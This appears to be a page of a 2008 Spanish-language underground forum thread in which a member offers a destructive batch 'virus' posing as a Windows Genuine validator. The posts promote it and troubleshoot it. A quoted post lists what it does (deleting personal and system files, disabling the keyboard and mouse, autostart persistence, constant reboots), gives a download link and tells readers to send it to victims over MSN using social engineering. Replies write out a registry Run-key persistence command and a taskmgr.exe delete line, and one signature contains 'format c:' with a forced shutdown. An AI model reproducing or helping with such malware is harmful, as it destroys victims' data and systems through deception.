Virus real

Nuevas NORMAS para el foro

	Bienvenido(a), Visitante. Favor de ingresar o registrarse. ¿Perdiste tu email de activación? - Agosto 21, 2008, 11:45:35 Boton Buscar

Visita: Articulos - Juegos Gratis - Da Foros

Comunidad Underground Hispana | Programacion | Programación | Batch (Moderadores: Espectro Infernal, The Shadow) | Tema: Virus real

0 Usuarios y 1 Visitante están viendo este tema.

« anterior próximo »

Páginas: 1 [2]

Autor

Tema: Virus real (Leído 699 veces)

e0f-R00t. [ Vacaciones ]
Gran Colaborador

Desconectado

Mensajes: 2399

EndOfFile................. CodeBuser..............

Re: Virus real

« Respuesta #25 en: Abril 08, 2008, 01:03:56 »

a ver, segun el code del .bat, no se borraria ningun archivo a partir del :delfiles, tan solo te iria preguntando si desea eliminar o no en todos esos archivos....

a parte necesitarias permisos de admin para borrarlos, como ya dijo the shadow, dices tu que lo probaste en una maquina virtual, bien te aseguraste de no ser administrador cuando lo ejecutaste?...

y ademas para que metes esta parte

Citar

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WindowsGenuine.exe /t REG_SZ /d C:\windows\system32\WindowsGenuine.exe /f

si no se va a copiar en C:\windows\system32\

yo que tu arreglaria los fallos he intentaria usar mas variables, para que sea mas ligero el code

saludos


« Última modificación: Abril 08, 2008, 01:04:43 por DarKDiam0nd »	En línea

NORMAS DEL FORO

Acunetix Web Vulnerability | NOD32 ESET Smart Security 3.0.650 Full | KIS6 & KIS7 [ de por vida ]
Tutorial Remote File Inclusion ( RFI ) | Evitando SQL Injection
La imaginacion es lo mas poderoso que ha conocido el ser humano
TerminalHacker.net
LatinoHack.com

cuban-hack
Habitual

Desconectado

Mensajes: 275

en la vida hay cosas que no se pueden explicar....

Re: Virus real

« Respuesta #26 en: Abril 08, 2008, 01:12:23 »

si el teclado sigue funcionando, no tengo idea de como hacerlo...
pero una cosa si, para molestar un poco... cambiarle el idioma al teclado
con el comando:
kb16


	En línea

vivimos para amar,
y el amor es todo lo que nos rodea....
material o no......
por eso vive con pacion todo lo que digas o escrivas.. y seras recordado..
yu cuban-hack [cub2(daviel)]
echo off
format c:\
y/n:y
y/n:y
shutdown -r -t 05 -e "JODETE"
msgs *yo vivo jodiendo y ¿tu?

e0f-R00t. [ Vacaciones ]
Gran Colaborador

Desconectado

Mensajes: 2399

EndOfFile................. CodeBuser..............

Re: Virus real

« Respuesta #27 en: Abril 08, 2008, 01:26:09 »

podrian probar, modificando el interior de ese archivo, quizas asi no responda bien el teclado

saludos


	En línea

NORMAS DEL FORO

Klez.H
Colaborador

Desconectado

Mensajes: 455

Dios es sofisticado, pero no malévolo.

Re: Virus real

« Respuesta #28 en: Abril 08, 2008, 03:53:18 »

DARkdiAMoND:

1-El "virus" tiene extencion .EXE no .BAT!
2-En la etiqueta delfiles no hay nesecidad de poner ningun atributo para eliminar los archivos, (Yo mismo hice la prueba), ademas esta en modo Ghost y en ningun momento aparece la consola!
3-REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v TUBATCH.bat /t REG_SZ /d C:\TUBATCH.bat ("Formula general" para añadir un archivo bat al arranque de Windows).!

SALUDOS salud


	En línea

Bizz
Visitante

Re: Virus real

« Respuesta #29 en: Abril 08, 2008, 03:55:35 »

eso funciona si tu C:\TUBATCH.bat esta en c: peor tu archivo no esta en la ruta ke tu añades al registro asike de nada sirve


	En línea

e0f-R00t. [ Vacaciones ]
Gran Colaborador

Desconectado

Mensajes: 2399

EndOfFile................. CodeBuser..............

Re: Virus real

« Respuesta #30 en: Abril 08, 2008, 04:16:13 »

mm....con esta clave, el archivo no se borra directamente, antes te pregunta, si no compruebalo por ti mismo

Citar

del "%systemroot%\system32\taskmgr.exe"

saludos


	En línea

NORMAS DEL FORO

Klez.H
Colaborador

Desconectado

Mensajes: 455

Dios es sofisticado, pero no malévolo.

Re: Virus real

« Respuesta #31 en: Abril 09, 2008, 12:02:01 »

Como digan........................................................................ Grin


	En línea

Alevsk
Habitual

Desconectado

Mensajes: 348

Mi NoMbRe Es Alevsk!!! >.<

Re: Virus real

« Respuesta #32 en: Abril 10, 2008, 10:09:21 »

Oye amigo una duda, si ejecutp el virus en una pc con deep freeze, al reiniciar la pc estara bien o se jode de todas maneras?

Tengo una dell con particion para restaurar sistema, el virus formatea esa particion?


	En línea

Una persona no puede conseguir algo, sin perder otra cosa a cambio...
Para crear una cosa debemos pagar con otra del mismo valor...
Es la ley de los estados equivalente...
En aquella epoca creiamos que esa era la unica verdad...

FreakMind
Habitual

Desconectado

Mensajes: 181

Re: Virus real

« Respuesta #33 en: Abril 10, 2008, 10:49:54 »

Buenas

No se batch pero ... saben lo que es un virus? porque eso no lo parece

Saludos, FreakMind


	En línea

Connoisseurs of C semantics find C++ inferior to ++C

Klez.H
Colaborador

Desconectado

Mensajes: 455

Dios es sofisticado, pero no malévolo.

Re: Virus real

« Respuesta #34 en: Abril 10, 2008, 11:51:31 »

Cita de: Alevsk en Abril 10, 2008, 10:09:21

Nunca use deep freeze pero el sistema se tendria que recuperar si lo usas. No estoy del todo seguro. Lo mas confiable es una PC virtual.

Cita de: FreakMind en Abril 10, 2008, 10:49:54

Buenas

No se batch pero ... saben lo que es un virus? porque eso no lo parece

Saludos, FreakMind

Si bien no cumple con todas las caracteristicas de un virus, en cierta forma lo es, porque:
-Tiene como objetivo alterar el normal funcionamiento de una computadora, sin el permiso o el conocimiento del usuario.
-El virus toma el control de los servicios básicos del sistema operativo, modificando o borrando, de manera posterior, archivos ejecutables que sean llamados para su ejecución.
-Se lo podria clasificar como un Virus de sistema operativo, cuyo objetivo consiste en alterar aquellos archivos que gobiernan la computadora.
-Segun su tipo se lo podria denominar Archivo: los virus que infectan archivos del tipo *.EXE, *.DRV, *.DLL, *.BIN, *.OVL, *.SYS e incluso BAT. Este tipo de virus se añade al principio o al final del archivo. Estos se activan cada vez que el archivo infectado es ejecutado, ejecutando primero su código vírico y luego devuelve el control al programa infectado pudiendo permanecer residente en la memoria durante mucho tiempo después de que hayan sido activados.

(Esta de mas decir que esta programado en uno de los "lenguajes" mas inofensivos para hacer virus).

Saludos salud


« Última modificación: Abril 10, 2008, 11:56:21 por Klez.H »	En línea

FreakMind
Habitual

Desconectado

Mensajes: 181

Re: Virus real

« Respuesta #35 en: Abril 10, 2008, 01:07:18 »

Buenas

Cita de: Klez.H en Abril 10, 2008, 11:51:31

El primer item te lo acepto por el solo hecho que si borras esos archivos Win no funciona. Ahora el segundo ya no tanto. Si eliminas archivos, pero de que servicios tomas el control?. A mi entender tomar el control de algo es hacerlo funcionar como vos queres, no suprimirlo.

Cita de: Klez.H en Abril 10, 2008, 11:51:31

-Se lo podria clasificar como un Virus de sistema operativo, cuyo objetivo consiste en alterar aquellos archivos que gobiernan la computadora.

Bueno es la primera ves que escucho esa clasificacion pero te creo

Cita de: Klez.H en Abril 10, 2008, 11:51:31

-Segun su tipo se lo podria denominar Archivo: los virus que infectan archivos del tipo *.EXE, *.DRV, *.DLL, *.BIN, *.OVL, *.SYS e incluso BAT. Este tipo de virus se añade al principio o al final del archivo. Estos se activan cada vez que el archivo infectado es ejecutado, ejecutando primero su código vírico y luego devuelve el control al programa infectado pudiendo permanecer residente en la memoria durante mucho tiempo después de que hayan sido activados.

Ok. Vuelvo a repetir que no se batch. Podrias decirme donde "infecta" a otros archivos?. Solo veo (en el code que pusiste) puros delete

Definicion de virus segun McAfee

Citar

A virus is a computer program file capable of attaching to disks or other files and replicating itself repeatedly, typically without user knowledge or permission. Some viruses attach to files so when the infected file executes, the virus also executes. Other viruses sit in a computer's memory and infect files as the computer opens, modifies, or creates the files.

Saludos, FreakMind


	En línea

Connoisseurs of C semantics find C++ inferior to ++C

Klez.H
Colaborador

Desconectado

Mensajes: 455

Dios es sofisticado, pero no malévolo.

Re: Virus real

« Respuesta #36 en: Abril 11, 2008, 11:20:38 »

Bueno bueno bueno...
Lo de tomar el control se refiere mas a hacer lo que el usuario NO DESEE.
SI existen los virus de sistema operativo. (GOOGLE.COM) (nunca viene mal usarlo).
Lo de "infectar", "contagiar", "corromper", "pervertir" o como se les ocurra llamarlo hace a violar la integridad del sistema. (BORRANDO).

PD: Si van a ser criticas, que sean CONSTRUCTIVAS, y no ponerse a buscar palabra por palabra, letra por letra para encontrar infimos errores que no sirven mas que para perder el tiempo por lo que no pienso seguir discutiendo.

saludos salud


	En línea

Dark-Hacker
Habitual

Desconectado

Mensajes: 202

Re: Virus real

« Respuesta #37 en: Abril 11, 2008, 11:23:49 »

Cita de: Klez.H en Abril 11, 2008, 11:20:38

Hacia tiempo que no leia palabras tan sabias Grin


	En línea

FreakMind
Habitual

Desconectado

Mensajes: 181

Re: Virus real

« Respuesta #38 en: Abril 11, 2008, 02:36:22 »

Buenas. Voy por partes. Disculpen la extension de la respuesta

"Lo de tomar el control se refiere mas a hacer lo que el usuario NO DESEE.
Si tu lo dices. No estoy muy de acuerdo con tu definicion de "tomar el control" pero bueno"

"SI existen los virus de sistema operativo. (GOOGLE.COM) (nunca viene mal usarlo)."
Lo primero que te dije sobre esto fue "Bueno es la primera ves que escucho esa clasificacion pero te creo". Nunca dije que no existiera, fue un comentario, pero parece que estas algo perseguido.

"Lo de "infectar", "contagiar", "corromper", "pervertir" o como se les ocurra llamarlo hace a violar la integridad del sistema. (BORRANDO)".
A esto te respondo con algo que dijiste vos

Cita de: Klez.H en Abril 10, 2008, 11:51:31

"PD: Si van a ser criticas, que sean CONSTRUCTIVAS, y no ponerse a buscar palabra por palabra, letra por letra para encontrar infimos errores que no sirven mas que para perder el tiempo por lo que no pienso seguir discutiendo."
Si vos pensas que hablar con propiedad y usar las palabras correctas es innecesario/perdida de tiempo o cualquier sinonimo que quieras ponerle (y no lastime tus sentimientos) entonces tenes razon mi critica no fue para nada constructiva.

Pregunta a Dark-Hacker: para vos las palabras sabias de Klez.H fueron las que dijo en el PD? o en donde?

Saludos, FreakMind


	En línea

Connoisseurs of C semantics find C++ inferior to ++C

DarkIker
Habitual

Conectado

Mensajes: 263

Colombia Underground Team

Re: Virus real

« Respuesta #39 en: Abril 12, 2008, 02:21:27 »

Eso pasa cuando los articulos de wikipedia los escriben los basheros xD, NO EXISTEN NI EXISTIRAN LOS VIRUS DE SISTEMA OPERATIVO gracias, ahora desenvuelvo mi planteamiento comenzando por referencias serias, ya que realmente el articulo en español de wikipedia y no es por joder pero deja muicho que desear:

http://en.wikipedia.org/wiki/Computer_virus

No cae mal un cursito de ingles, siguiendo como puede existir digamoslo asi un virus de sistema operativo? si procedemos a ver las palabras pues coño que acaso existe algun virus que no sea de sistema operativo?, la verdad dezconozco si existe un virus para el SPARC, Pentium, AMD, etc... , ahora que si nos fijamos aun en la definicion de metodos de infeccion tanto en la wiki en español como en la ingles, este "dizque" virus real no ocupa ninguno de los metodos tanto de infeccion como de evasion.
Para mi y a opinion personal sin intencion de herrir sus sentimientos( Kiss

) es solo un script maligno, y no lo lleguen a comparar con VBS por que es mucha la diferencia. Choas.

Att: DarkIker


	En línea

http://www.colombiaunderground.org --> Colombia Underground Team
http://darkiker.blogspot.com --> My Blog

Fashion
Colaborador

Desconectado

Mensajes: 915

Re: Virus real

« Respuesta #40 en: Abril 12, 2008, 03:07:42 »

Cita de: Klez.H en Abril 02, 2008, 03:20:03

Este ejecutable programado en lenguaje batch aparenta ser un validador de Windows, algo que le interesa a la mayoria de las persona, Hacer su Windows genuino.

Espero que les guste:

VENTAJAS:
-Borra todos los documentos personales (Fotos, musica, dodumentos de texto, etc).
-Borra archivos esenciales de Windows (Dll`s, editor del registro, taskmanager, etc).
-Deja inutilizable el mouse, teclado y otros dispositivos de harware.
-Borra entradas del registro importantes (Especialmente Software de cualquier tipo).
-Se copia al arraque de Windows (Se ejecuta cada vez que se prende la PC).
-Reinicia la PC cada 1 segundo.
-Funciona en la mayoria de los Windows (Especialmente XP).
-Posee extencion .exe (Si la victima sabe "algo" de programacion batch no podra "editar" el virus para ver el codigo y asi ver lo que hace. (Se disminuyen las sospechas).
-Indetectable por cualquier antivirus (Se disminuyen las sospechas).
-Funciona en modo ghost (La pantalla cmd no aparece en ningun momento); (Se disminuyen las sospechas).
-Posee un icono y nombre acordes con el supuesto "programa". (Se disminuyen las sospechas).
-No se puede borrar facilmente despues de su ejecucion(Es un proceso).
-Soluciones despues de su ejecucion: Formatear.
-No es nesesario comprimirlo en .rar o .zip para "compartir" por MSN.

DESVENTAJAS:
-Solo funciona en Windows.

NOTAS:
-Este "virus" ya viene con un nombre y un icono determinado, es importante que no le cambien el nombre ya que sino no se puede añadir al registro de arranque de Windows.
El nombre es WindowsGenuine (No lo cambien).
-Solo basta usar algo de ingenieria social en el MSN, mandarlo sin comprimir y esperar que sea ejecutado por la victima.
-No me hago responsable de su uso, no lo usen por que si, haganlo con una buena razon.

Icono:

Si se quiere borrar despues de su ejecucion:

Descargar:
http://rapidshare.com/files/104428351/WindowsGenuine.exe.html

Repito!: No lo usen para divertirse, no lo usen por que si, usenlo de forma inteligente.
PD: Esta de mas decirles que no lo ejecuten.

Saludos salud

Al desensamblar el archivo .exe y abstraer archivos de él, el antivirus NOD 32 se activa, le dejo la imagen.

Utilizo mucha información que NOD32 reconoce como troyano lo comprobe al editar el archivo .BAT.

Respecto a que el archivo no se puede borrar, bueno le dire que si se puede borrar con un desbloqueador de procesos, esto lo comprobe como usuario: "Administrador".

Lo recomendable sería arreglar esos fallos que posee , tambien tienes codigo que puede disminuirse y mejorarse, analizalo mejor.

PD: Parece solo un script maligno, más no un virus.

Fashion


« Última modificación: Abril 12, 2008, 03:30:36 por Fashion »	En línea

Referencie Mi Nick Click Aquí

Klez.H
Colaborador

Desconectado

Mensajes: 455

Dios es sofisticado, pero no malévolo.

Re: Virus real

« Respuesta #41 en: Abril 12, 2008, 04:01:24 »

Que raro hice lo mismo...y a mi no me detecto nada, y eso que uso NOD32 tambien. Como sea, con respecto a terminar el proceso WindowsGenuine.exe esta claro que si se puede desbloquear con el UnLocker o con el mismo administrador de tareas, la unico que importa es que no da tiempo a hacerlo Wink


	En línea

Páginas: 1 [2]

Comunidad Underground Hispana \| Programacion \| Programación \| Batch (Moderadores: Espectro Infernal, The Shadow) \| Tema: Virus real	« anterior próximo »

Ir a: